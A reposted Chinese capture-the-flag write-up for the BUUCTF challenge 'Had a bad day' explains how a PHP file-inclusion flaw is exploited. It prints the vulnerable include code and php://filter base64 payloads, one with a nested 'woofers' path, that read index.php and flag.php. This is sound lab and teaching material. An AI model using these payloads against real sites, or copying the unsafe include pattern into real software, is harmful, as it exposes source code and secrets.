碼上快樂

相關內容    簡體    繁體

BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)

本文轉載自   查看原文   2020-05-09 21:46   634    web

打開靶機,有2個按鈕

點擊按鈕,url會發生變化

嘗試利用php://filter偽協議獲取index.php源碼

php://filter/read=convert.base64-encode/resource=index.php


報錯,去掉后綴
進行base64 decode,得到index.php:

<?php
	$file = $_GET['category'];
	if(isset($file)){
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index"))
		{
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

直接讀flag.php,?category=woofers/../flag,頁面沒啥變化,F12
發現源碼中有多出東西,說明flag.php確實是成功包含了



!!!php://filter偽協議嵌套,套一層要求的$file
php://filter/read=convert.base64-encode/woofers/resource=flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 BUUCTF-[NPUCTF2020]ezinclude wp BUUCTF-[MRCTF2020]你傳你馬呢 Writeup BUUCTF-[ACTF2020 新生賽]Upload 1詳解 BUUCTF-[ACTF新生賽2020]easyre wp BUUCTF-[極客大挑戰 2019]LoveSQL 1詳解 buuctf-[RoarCTF2019]babyRSA mac Path had bad ownership/permissions Tomcat文件包含漏洞的搭建與復現:CVE-2020-1938 Apache Tomcat 文件包含漏洞(CVE-2020-1938) BUUCTF-2020寒假刷題記錄
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM